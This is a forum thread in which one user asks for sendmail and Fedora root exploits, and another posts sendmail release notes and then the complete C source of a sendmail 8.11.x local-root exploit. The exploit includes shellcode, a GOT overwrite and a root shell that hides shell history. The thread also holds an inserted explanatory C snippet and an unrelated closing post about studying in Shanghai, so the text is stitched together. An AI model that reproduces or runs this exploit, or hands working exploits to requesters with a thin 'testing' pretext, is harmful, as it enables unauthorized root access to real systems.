27-05-2009, 01:48 PM | #1 | Junior Member
Looking for some information
Hey guys,
I'm looking for a remote exploit for sendmail ver. 8.11.6 working on Redhat 7.3, or a local root exploit for Fedora Core 4.
If you know where to search or any good website, please send me the info.
Take care
27-05-2009, 01:57 PM | #2 | Member
Information on Sendmail remote exploits
Hello h3xx,
the best way to learn about exploits and security issues in Sendmail 8.11.6 is to check what was fixed in Sendmail 8.11.7, but this doesn't mean that is all; there are surely other "holes" that were fixed in later Sendmail versions.
Here is what was fixed from 8.11.6 to 8.11.7
Code:
8.11.7/8.11.7 2003/03/29
SECURITY: Fix a remote buffer overflow in header parsing by
dropping sender and recipient header comments if the
comments are too long. Problem noted by Mark Dowd
of ISS X-Force.
SECURITY: Fix a buffer overflow in address parsing due to
a char to int conversion problem which is potentially
remotely exploitable. Problem found by Michal Zalewski.
Note: an MTA that is not patched might be vulnerable to
data that it receives from untrusted sources, which
includes DNS.
To provide partial protection to internal, unpatched sendmail MTAs,
8.11.7 changes by default (char)0xff to (char)0x7f in
headers etc. To turn off this conversion compile with
-DALLOW_255 or use the command line option -d82.101.
To provide partial protection for internal, unpatched MTAs that may be
performing 7->8 or 8->7 bit MIME conversions, the default
for MaxMimeHeaderLength has been changed to 2048/1024.
Note: this does have a performance impact, and it only
protects against frontal attacks from the outside.
To disable the checks and return to pre-8.11.7 defaults,
set MaxMimeHeaderLength to 0/0.
Properly clean up macros to avoid persistence of session data
across various connections. This could cause session
oriented restrictions, e.g., STARTTLS requirements,
to erroneously allow a connection. Problem noted
by Tim Maletic of Priority Health.
Ignore comments in NIS host records when trying to find the
canonical name for a host.
Fix a memory leak when closing Hesiod maps.
Set ${msg_size} macro when reading a message from the command line
or the queue.
Prevent a segmentation fault when clearing the event list by
turning off alarms before checking if event list is
empty. Problem noted by Allan E Johannesen of Worcester
Polytechnic Institute.
Fix a potential core dump problem if the environment variable
NAME is set. Problem noted by Beth A. Chaney of
Purdue University.
Prevent a race condition on child cleanup for delivery to files.
Problem noted by Fletcher Mattox of the University of
Texas.
CONFIG: Do not bounce mail if FEATURE(`ldap_routing')'s bounce
parameter is set and the LDAP lookup returns a temporary
error.
CONFIG: Fix a syntax error in the try_tls ruleset if
FEATURE(`access_db') is not enabled.
LIBSMDB: Fix a lock race condition that affects makemap, praliases,
and vacation.
LIBSMDB: Avoid a file creation race condition for Berkeley DB 1.X
and NDBM on systems with the O_EXLOCK open(2) flag.
MAKEMAP: Avoid going beyond the end of an input line if it does
not contain a value for a key. Based on patch from
Mark Bixby from Hewlett-Packard.
MAIL.LOCAL: Fix a truncation race condition if the close() on
the mailbox fails. Problem noted by Tomoko Fukuzawa of
Sun Microsystems.
SMRSH: SECURITY: Only allow regular files or symbolic links to be
used for a command. Problem noted by David Endler of
iDEFENSE, Inc.
from http://www.sendmail.org/documentation/releaseNotes
Here you can see which systems are affected by the buffer overflow in address parsing, which is potentially remotely exploitable.
Also the following link can help you: http://ftp.cerias.purdue.edu/pub/adv...rescan.Bug.txt
If you find some other information, please let me know... it can help somebody else.
Last edited by utnalove; 27-05-2009 at 02:00 PM.
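As an added example (not part of the post above or of sendmail's own code), the mechanism behind the second fix and its mitigation: a plain `char` promoted to `int` turns a 0xff byte into a negative table index, the `unsigned char` cast avoids that, and 8.11.7's default rewrite of 0xff to 0x7f in header data keeps the byte away from unpatched MTAs. The character-class table and the header fragment are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <limits.h>
/* Constructed 256-entry character-class table, indexed by byte value the
 * way address-parsing code does: 1 = allowed in an address atom. */
static unsigned char classtab[UCHAR_MAX + 1];

int init_classtab(void)            /* returns number of allowed bytes */
{
    int n = 0;
    for (int c = 0; c <= UCHAR_MAX; c++)
        if (isalnum(c) || c == '.' || c == '-' || c == '@')
            classtab[c] = 1, n++;
    return n;
}

/* The pitfall: on i386 Linux plain char is signed (modelled here with
 * signed char so every host behaves alike).  A 0xff byte promotes to -1,
 * so classtab[idx] would read well before the table.  Reports only. */
int index_is_negative(signed char c)
{
    int idx = c;                   /* integer promotion sign-extends */
    return idx < 0;
}

/* The fix: convert through unsigned char, so the index is always 0..255. */
unsigned char safe_class(char c)
{
    return classtab[(unsigned char)c];
}

/* 8.11.7's partial protection: rewrite 0xff to 0x7f in header data so an
 * unpatched MTA downstream never sees it.  Returns bytes rewritten. */
size_t strip_255(unsigned char *buf, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0xff) { buf[i] = 0x7f; n++; }
    return n;
}

int main(void)
{
    unsigned char hdr[] = "From: a\xff" "\xff" "b@example.com"; /* constructed */
    init_classtab();
    printf("0xff as signed char indexes negative: %d, rewrote %zu byte(s)\n",
           index_is_negative((signed char)0xff), strip_255(hdr, strlen((char *)hdr)));
    return 0;
}
```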
27-05-2009, 02:08 PM | #3 | Junior Member
yea .. but...
I'm looking for working exploits, not fixes, because I want to use them (for testing purposes, of course).
It can also be code to compile (even with some common errors).
But thanks for trying.
ciao
27-05-2009, 02:27 PM | #4 | Member
look at this...
from milw0rm.com; it should work for all sendmail 8.11.x versions
Code:
/*
sendmail 8.11.x exploit (i386-Linux) by sd@sf.cz (sd@ircnet)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This code exploits well-known local-root bug in sendmail 8.11.x,
8.12.x may be vulnerable too, but I didn't test it.
It gives instant root shell with +s sendmail 8.11.x, x < 6
We're using objdump, gdb & grep in order to obtain VECT, so make sure
that they're on $PATH, works with 80% accuracy on stripped binaries
on several distros without changing offsets (rh7.0, rh7.1, suse7.2,
slackware 8.0...)
Greetz:
mlg & smoke : diz is mostly for .ro ppl ;) killall sl3
sorcerer : stop da fuckin' asking me how to sploit sm, diz crap
is for lamers like you ;))))
devik : sm 0wns ;)
to #linux.cz, #hack ....
.... and to alot of other ppl, where i can't remeber theyr handles ;)
args:
-d specify depth of analysis (default=32) [bigger = more time]
-o change offset (default = -32000) [between 1000..-64000]
-v specify victim (default /usr/sbin/sendmail) [+s sm binary]
-t specify temp directory (default /tmp/.sxp)
[temporary files, should be mounted as nosuid]
An example (redhat 7.0 CZ):
-------------------------------------------------------------------------------
[sd@pikatchu sxp]$ gcc sx.c -o sx
[sd@localhost sxp]$ ./sx
...-=[ Sendmail 8.11.x exploit, (c)oded by sd@sf.cz [sd@ircnet], 2001 ]=-...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[*] Victim = /usr/sbin/sendmail
[*] Depth = 32
[*] Offset = -16384
[*] Temp = /tmp/.sxp
[*] ESP = 0xbfffe708
[+] Created /tmp/.sxp
[+] Step 1. setuid() got = 0x080aa028
[*] Step 2. Copying /usr/sbin/sendmail to /tmp/.sxp/sm...OK
[*] Step 3. Disassembling /tmp/.sxp/sm...OK, found 3 targets
[*] Step 4. Exploiting 3 targets:
[1] (33% of targets) GOT=0x080aa028, VECT=0x00000064, offset=-16384
[2] (66% of targets) GOT=0x080aa028, VECT=0x080c6260, offset=-16384
Voila babe, entering rootshell!
Enjoy!
uid=0(root) gid=0(root) groups=0(root)
[root@pikatchu /]# whoami
root
[root@pikatchu /]# exit
exit
Thanx for choosing sd's products ;)
[sd@pikatchu sxp]$
--------------------------------------------------------------------------------
Enjoy! And don't abuse it too much :)
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/wait.h>
#include <string.h>
#define SM "/usr/sbin/sendmail"
#define OBJDUMP "objdump"
#define GDB "gdb"
#define GREP "grep"
#define OURDIR "/tmp/.sxp"
/* an basic regexp to get interesting stuff from disassembled output
change it as you like if something doesn't work */
#define DLINE "%s -d %s 2> /dev/null | %s -B %d \"mov.*%%.l,(%%e..,%%e..,1)\" | %s \".mov .*0x80.*,%%e..\""
#define DLINEA OBJDUMP, vict, GREP, depth, GREP
#define BRUTE_DLINE "%s -d %s 2> /dev/null | %s \".mov .*0x80.*,%%e..\""
#define BRUTE_DLINEA OBJDUMP, vict, GREP
#define NOPLEN 32768
#define uchar unsigned char
#define NOP 0x90
/* 19 bytes ;), shell must be appended */
char shellcode[] =
"\xeb\x0c\x5b\x31\xc0\x50\x89\xe1"
"\x89\xe2\xb0\x0b\xcd\x80\xe8\xef"
"\xff\xff\xff";
char scode[512];
char dvict[] = SM;
struct target {
uint off;
uint brk;
uint vect;
};
unsigned int get_esp()
{
__asm__("movl %esp,%eax");
}
char ourdir[256] = OURDIR;
/* cleanup */
void giveup(int i)
{
char buf[256];
sprintf(buf, "/bin/rm -rf %s > /dev/null 2> /dev/null", ourdir);
system(buf);
if (i >= 0) exit(i);
}
/* main sploit, stolen mostly from alsou.c ;) */
void sploit(char *victim, uint got, uint vect, uint ret)
{
uchar egg[sizeof(scode) + NOPLEN + 5];
char s[512] = "-d";
char *argv[3];
char *envp[2];
uint first, last, i;
strcpy(egg, "EGG=");
memset(egg + 4, NOP, NOPLEN);
strcpy(egg + 4 + NOPLEN, scode);
last = first = -vect - (0xffffffff - got + 1);
while (ret) {
char tmp[256];
i = ret & 0xff;
sprintf(tmp, "%u-%u.%u-", first, last, i);
strcat(s, tmp);
last = ++first;
ret = ret >> 8;
}
s[strlen(s) - 1] = 0;
argv[0] = victim;
argv[1] = s;
argv[2] = NULL;
envp[0] = egg;
envp[1] = NULL;
execve(victim, argv, envp);
}
int use(char *s)
{
printf("%s [command] [options]\n"
"-h this help\n"
"-d specify depth of analysis (default=32)\n"
"-o change offset (default = -32000)\n"
"-v specify victim (default /usr/sbin/sendmail)\n"
"-t specify temp directory (default /tmp/.sxp)\n"
"-b enables bruteforce (WARNING: this may take about 20-30 minutes!)\n", s);
return 1;
}
/* exploited flag */
int exploited = 0;
/* child root-shell will send us SIGUSR if everything is ok */
void sigusr(int i)
{
exploited++;
giveup(-1);
}
int main(int argc, char *argv[])
{
char victim[256] = SM;
char vict[256];
char gscr[256];
char path[256];
char d[256];
struct stat st;
FILE *f;
char buf[256];
int got;
struct target t[1024];
uint off, ep, l;
int i,j;
int offset = -16384;
int esp;
int depth = 32;
int brute = 0;
/* rootshell (if argv[0] == NULL) */
if (!*argv) {
/* open stdin and stdout */
dup2(2, 0);
dup2(2, 1);
setuid(0); /* regain root privs */
setgid(0);
/* send signal to parent that exploit is done */
kill(getppid(), SIGUSR1);
/* l-a-m-e ;) */
printf("\nVoila babe, entering rootshell!\nEnjoy!\n"); fflush(stdout);
chdir("/");
system("/usr/bin/id");
setenv("BASH_HISTORY", "/dev/null", 1);
execl("/bin/bash", "-bash", NULL);
}
printf("\n...-=[ Sendmail 8.11.x exploit, (c)oded by sd@sf.cz [sd@ircnet], 2001 ]=-...\n"
" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n");
while ( ( i = getopt(argc, argv, "hd:o:v:t:b") ) != EOF) {
switch (i) {
case 'd':
if ((!optarg) || (sscanf(optarg, "%d", &depth) != 1))
return use(argv[0]);
break;
case 'o':
if ((!optarg) || (sscanf(optarg, "%d", &offset) != 1))
return use(argv[0]);
break;
case 'v':
if (!optarg) return use(argv[0]);
strcpy(victim, optarg);
break;
case 't':
if (!optarg) return use(argv[0]);
strcpy(ourdir, optarg);
break;
case 'b':
brute++;
break;
case 'h':
default:
return use(argv[0]);
}
}
if (brute) printf("[*] Using brute force, this may take some time\n");
/* create full path to rootshell, cause
sendmail will change it's cwd */
path[0] = 0;
if (argv[0][0] != '/') {
getcwd(path, 256);
}
/* construct shellcode */
sprintf(scode, "%s%s/%s", shellcode, path, argv[0]);
/* get stack frame */
esp = get_esp();
close(0);
signal(SIGUSR1, sigusr);
/* remove old stuff */
giveup(-1);
printf( "[*] Victim = %s\n"
"[*] Depth = %d\n"
"[*] Offset = %d\n"
"[*] Temp = %s\n"
"[*] ESP = 0x%08x\n",
victim,
depth,
offset,
ourdir,
esp);
stat(victim, &st);
if ((st.st_mode & S_ISUID) == 0) {
printf("[-] Bad: %s isn't suid ;(\n", victim);
}
if (access(victim, R_OK + X_OK + F_OK) < 0) {
printf("[-] Bad: We haven't access to %s !\n", victim);
}
if (mkdir(ourdir, 0777) < 0) {
perror("[-] Can't create our tempdir!\n");
giveup(1);
}
printf("[+] Created %s\n", ourdir);
sprintf(buf, "%s -R %s | grep setuid", OBJDUMP, victim);
f = popen(buf, "r");
if (fscanf(f, "%x", &got) != 1) {
pclose(f);
printf("[-] Cannot get setuid() GOT\n");
giveup(1);
}
/* get GOT */
pclose(f);
printf("[+] Step 1. setuid() got = 0x%08x\n", got);
sprintf(vict, "%s/sm", ourdir);
printf("[*] Step 2. Copying %s to %s...", victim, vict); fflush(stdout);
sprintf(buf, "/bin/cp -f %s %s", victim, vict);
system(buf);
if (access(vict, R_OK + X_OK + F_OK) < 0) {
perror("Failed");
giveup(1);
}
printf("OK\n");
/* disassemble & find targets*/
printf("[*] Step 3. Disassembling %s...", vict); fflush(stdout);
if (!brute) {
sprintf(buf, DLINE, DLINEA);
} else {
sprintf(buf, BRUTE_DLINE, BRUTE_DLINEA);
}
f = popen(buf, "r");
i = 0;
while (fgets(buf, 256, f)) {
int k, dontadd = 0;
if (sscanf(buf, "%x: %s %s %s %s %s %s 0x%x,%s\n",
&ep, d, d, d, d, d, d, &off, d) == 9) {
/* same value ? */
for (k=0; k < i; k++) {
if (t[k].off == off) dontadd++;
}
/* new value ? */
if (!dontadd) {
/* add it to table */
t[i].off = off;
t[i++].brk = ep;
}
}
}
pclose(f);
printf("OK, found %d targets\n", i);
/* gdb every target and look for theyr VECT */
printf("[*] Step 4. Exploiting %d targets:\n", i); fflush(stdout);
sprintf(gscr, "%s/gdb", ourdir);
off = 0;
for (j=0; j < i; j++) {
/* create gdb script */
f = fopen(gscr, "w+");
if (!f) {
printf("Cannot create gdb script\n");
giveup(1);
}
fprintf(f, "break *0x%x\nr -d1-1.1\nx/x 0x%x\n", t[j].brk, t[j].off);
fclose(f);
sprintf(buf, "%s -batch -x %s %s 2> /dev/null", GDB, gscr, vict);
f = popen(buf, "r");
if (!f) {
printf("Failed to spawn gdb!\n");
giveup(1);
}
/* scan gdb's output */
while (1) {
char buf[256];
char *p;
t[j].vect = 0;
p = fgets(buf, 256, f);
if (!p) break;
if (sscanf(p, "0x%x %s 0x%x", &ep, d, &l) == 3) {
t[j].vect = l;
off++;
break;
}
}
pclose(f);
if (t[j].vect) {
int pid;
printf("[%d] (%d%% of targets) GOT=0x%08x, VECT=0x%08x, offset=%d\n", j, j*100/i , got, t[j].vect, offset);
fflush(stdout);
pid = fork();
if (pid == 0) {
close(1);
sploit(victim, got, t[j].vect, esp + offset);
}
/* wait until sendmail finishes (expoit failed)
or until SIGUSR arrives */
wait(NULL);
/* exploited ?? */
if (exploited) {
wait(NULL); /* kill zombie */
printf("Thanx for choosing sd's products ;)\n");
exit(0);
}
}
}
printf("[-] All targets failed, probably not vulnerable ;(\n");
giveup(1);
}
/* That's all. */
// milw0rm.com [2001-01-01]
Is that what you were looking for?
Last edited by utnalove; 27-05-2009 at 02:30 PM.
27-05-2009, 02:42 PM | #5 | Junior Member
27-05-2009, 02:46 PM | #6 | Member
let us know..
hasta la vista
19-11-2009, 05:38 PM | #7 | Junior Member
Looking for some information
Hello Chi West
I have been browsing around your website, and well done on the new layout, it is much more functional than the older one.
I did a search for Masters Degree programmes in Shanghai taught in English as I am not sure I would be able to learn Chinese well enough to study in the language by the time I would like to begin in 2010.
I came across Fudan University in Shanghai, which offers courses in Computer Applied Sciences and Computer Application Theory, the two subjects that I would most likely want to study.
Is there any formal way of contacting the university itself, as their English websites usually offer very little contact information, and when they do, a reply is usually not given?
I would like to know more about the individual universities and what they can offer in terms of accommodation and so on; that is the reason for my asking.
Best Regards
Mr. Mikkel Stig Larsen